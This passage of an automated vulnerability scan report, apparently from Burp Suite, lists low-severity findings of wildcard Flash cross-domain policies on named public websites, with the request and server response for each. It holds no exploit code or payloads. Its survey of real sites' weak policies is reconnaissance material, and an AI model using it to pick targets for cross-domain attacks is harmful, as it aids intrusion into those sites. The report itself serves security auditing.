Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.politicsdaily.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.politicsdaily.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:08 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 318
Keep-Alive: timeout=5, max=999930
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...
7.397. http://www.poptropica.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.poptropica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.poptropica.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Cache-Control: max-age=3600
Date: Thu, 09 Dec 2010 19:11:15 GMT
Server: TUX/2.0 (Linux)
Content-Length: 363
Accept-Ranges: bytes
Last-Modified: Thu, 18 Nov 2010 18:53:18 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.poptropica.com" secure="false" /><allow-access-from domain="*.familyeducation.com" secure="false" /><allow-access-from domain="*.http.akamai-trials.com" secure="false" />
...[SNIP]...
7.398. http://www.potterybarn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.potterybarn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.potterybarn.com

Response

HTTP/1.0 200 OK
Content-Length: 378
Content-Type: text/xml;charset=UTF-8
Set-Cookie: PBDPWWW-EC=R4233321340; expires=Sun, 03-Apr-2011 14:02:11 GMT; domain=.potterybarn.com; path=/
Set-Cookie: WSPFY=179ed7406c5f00002a2b974d260501009b500000; expires=Mon, 1-Jan-2024 00:00:01 GMT; domain=.potterybarn.com; path=/
Set-Cookie: PBPE_SID=pbec2KSSSMJH0S2OTJ2WGTOLLSSRTRQK201104020656; domain=.potterybarn.com; path=/
Set-Cookie: WSIDC=EAST; domain=.potterybarn.com; path=/
Content-Language: en-US
Expires: Sat, 02 Apr 2011 13:56:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:56:58 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies
...[SNIP]...
<allow-access-from domain="*.potterybarn.com" secure="false"/>
...[SNIP]...
7.399. http://www.progressive.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.progressive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.progressive.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:45:03 GMT
Content-Type: text/xml
Content-Location: http://www.progressive.com/crossdomain.xml
Last-Modified: Mon, 22 Oct 2007 11:22:08 GMT
Accept-Ranges: bytes
ETag: "0b01fc89d14c81:ca5"
Server: Microsoft-IIS/6.0
P3P: CP = "CUR ADM DEV TAI PSA PSD IVAo IVDo CONo OUR OTRo IND DSP COR CAO PHY ONL UNI PUR COM FIN NAV INT DEM CNT STA GOV OTC" policyref="http://www.progressive.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=2dc241d661cb4382b8af9de86e7835f0; path=/; domain=.progressive.com; expires=Sun, 31 Dec 2034 00:00:00 GMT
Set-Cookie: TLTSID=69BA113F409A71A1A698969E82A8BB47; Domain=.progressive.com; path=/
Set-Cookie: TLTHID=69BA113F409A71A1A698969E82A8BB47; Domain=.progressive.com; path=/
Set-Cookie: TLTUID=69BA113F409A71A1A698969E82A8BB47; Domain=.progressive.com; path=/; expires=Sat, 02-04-2021 13:45:03 GMT
Content-Length: 617

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="localhost" />
<allow-access-from domain="*.progressive.local" />
<allow-access-from domain="*.progressivedirect.local" />
<allow-access-from domain="*.progressive.com" />
<allow-access-from domain="*.progressivedirect.com" />
<allow-access-from domain="*.progressiveseguros.local" />
<allow-access-from domain="*.progressiveseguros.com" />
<allow-access-from domain="*.speedera.net" />
...[SNIP]...
7.400. http://www.psu.edu/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.psu.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.psu.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:02 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Fri, 17 Oct 2008 10:07:40 GMT
ETag: "1958-7d-48f863ec"
Accept-Ranges: bytes
Content-Length: 125
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*.psu.edu"/>
<allow-access-from domain="*.wpsu.org"/>
</cross-domain-policy>
7.401. http://www.realage.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.realage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realage.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=427
Date: Sat, 02 Apr 2011 13:34:44 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...
7.402. http://www.rei.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rei.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rei.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 10 Jul 2008 16:16:21 GMT
Cache-Control: public, max-age=600, must-revalidate
Expires: Wed, 30 Mar 2011 16:40:03 GMT
P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 13:55:40 GMT
Content-Length: 345
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.rei.com" sec
...[SNIP]...
<allow-access-from domain="rei.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.rei.com" secure="true"/>
...[SNIP]...
7.403. http://www.reuters.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:55 GMT
Server: Apache-Coyote/1.1
Expires: Sat, 02 Apr 2011 13:37:55 GMT
browser-expires: Sat, 2 Apr 2011 13:32:55 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 791
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...
7.404. http://www.reverbnation.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reverbnation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reverbnation.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8n-fips Phusion_Passenger/3.0.4
Last-Modified: Wed, 30 Sep 2009 20:43:01 GMT
ETag: "23a-474d193a69f40"
Accept-Ranges: bytes
Content-Length: 570
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml
Set-Cookie: BIGipServerCust15535_http_new=481582552.20480.0000; path=/

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   
   <site-control permitted-cross-domain-policies=
...[SNIP]...
<allow-access-from domain="71.120.201.8" />
   
   <allow-access-from domain="reverbnation.com" />
   <allow-access-from domain="*.reverbnation.com" />
   
   <allow-access-from domain="tunehive.com" />
   <allow-access-from domain="*.tunehive.com" />
...[SNIP]...
7.405. http://www.rightathome.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rightathome.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rightathome.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 26 Mar 2010 19:10:53 GMT
Accept-Ranges: bytes
ETag: "721d8e18cdca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Sat, 02 Apr 2011 14:14:09 GMT
Connection: close
Content-Length: 1075

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitt
...[SNIP]...
<allow-access-from domain="convertlanguage.com"/>
...[SNIP]...
<allow-access-from domain="*.convertlanguage.com"/>
...[SNIP]...
<allow-access-from domain="www.espanol.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="espanol.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="espanol.staging.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="rightathome.com"/>
...[SNIP]...
<allow-access-from domain="*.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="enes.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="enes.staging.rightathome.com"/>
                <allow-access-from domain="translate-test.rightathome.com"/>
...[SNIP]...
<allow-access-from domain="test.rightathome.com"/>
<allow-access-from domain="localhost"/>
...[SNIP]...
7.406. http://www.rivals.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rivals.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rivals.com

Response

HTTP/1.1 200 OK
Content-Length: 221
Content-Type: text/xml
Last-Modified: Tue, 15 Jan 2008 16:52:54 GMT
Accept-Ranges: bytes
ETag: "0b75f129757c81:718"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:46:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rivals.com" />
</c
...[SNIP]...
7.407. http://www.rockyou.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rockyou.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:05 GMT
Server: Apache/2.2
Last-Modified: Wed, 19 Jan 2011 02:10:58 GMT
ETag: "4c0-49a29871cf080"
Accept-Ranges: bytes
Content-Length: 1216
Vary: Accept-Encoding,User-Agent
X-RyHeader: www164.rockyou.com took D=126 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.rockmyspace.com" to-ports="*" />
<allow-access-from domain="*.rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockmyspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.meebo.com" to-ports="*" />
<allow-access-from domain="*.rockyou-internal.com" to-ports="*" />
<allow-access-from domain="api.msappspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="x.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochimedia.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn1.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn2.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn3.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn4.com" to-ports="*" />
...[SNIP]...
7.408. http://www.rotoworld.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rotoworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rotoworld.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 22 Dec 2010 20:54:50 GMT
Accept-Ranges: bytes
ETag: "08969791aa2cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 579
Expires: Sat, 02 Apr 2011 13:58:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:58:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="166.70.44.60" />
<allow-access-from domain="*.nbcuni.com" />
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.allstarstats.com" />
<allow-access-from domain="*.sandbox.com" />
<allow-access-from domain="*.sandboxplus.com" />
<allow-access-from domain="*.gannettonline.com" />
<allow-access-from domain="*.eyewonder.com" />
...[SNIP]...
7.409. http://www.rottentomatoes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.rottentomatoes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rottentomatoes.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:07 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 23:22:02 GMT
ETag: "14b"
Accept-Ranges: bytes
Content-Length: 331
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:33:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rottentomatoes.com" />
<allow-access-from domain="rottentomatoes.com" />
...[SNIP]...
7.410. http://www.roxwel.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.roxwel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.roxwel.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:07 GMT
Server: Apache/2.2.16 (Unix)
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.blastro.com" />
<allow-access-from domain="*.roxwel.com" />
<allow-access-from domain="*.yallwire.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.adxcel.com"/>
<allow-access-from domain="*.dev.adxcel.com"/>
...[SNIP]...
7.411. http://www.salesforce.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.salesforce.com

Response

HTTP/1.0 200 OK
Server: SFDC
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Date: Sat, 02 Apr 2011 13:45:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.salesforce.com" />
<allow-access-from domain="www.force.com" />
<allow-access-from domain="developer.force.com" />
<allow-access-from domain="salesforce.vo.llnwd.net" />
<allow-access-from domain="www3.stream.co.jp" />
<allow-access-from domain="salesforce.sitestream.com" />
<allow-access-from domain="*.jellyvision-conversation.com" />
...[SNIP]...
7.412. http://www.salon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.salon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.salon.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:16 GMT
Server: Apache
Last-Modified: Mon, 09 Nov 2009 08:58:02 GMT
ETag: "fd"
Accept-Ranges: bytes
Content-Length: 253
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:40:16 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="salon.com" />
<allow-access-from domain="www.salon.com" />
<allow-access-from domain="images.salon.com" />
<allow-access-from domain="*.salon.com" />
...[SNIP]...
7.413. http://www.scholastic.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scholastic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scholastic.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 04 Nov 2009 23:57:02 GMT
ETag: "09bc980aa5dca1:417f"
Content-Length: 1384
Content-Type: text/xml
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:54:10 GMT
Connection: close
Expires: Sat, 21 Nov 2009 02:33:32 GMT

<cross-domain-policy>
<allow-access-from domain="*.scholastic.com" secure="false"/>
<allow-access-from domain="*.brightcove.com" secure="false"/>
<allow-access-from domain="scholastic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.scholastic.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="progressive.playstream.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.thisispoint.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.interfuel.com" />
<allow-access-from domain="70.107.248.89" />
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
7.414. http://www.sears.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sears.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sears.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 23 Mar 2011 19:03:58 GMT
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:23:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:23:33 GMT
Content-Length: 2622
Connection: close
s-srvr:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sears.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cerosmedia.com" to-ports="*"/>
   <allow-access-from domain="*.cerosdevelopment.com"/>
   <allow-access-from domain="*.lightmakerorlando.com"/>
   <allow-access-from domain="*.richrelevance.com"/>
   <allow-access-from domain="*.blinds.net"/>
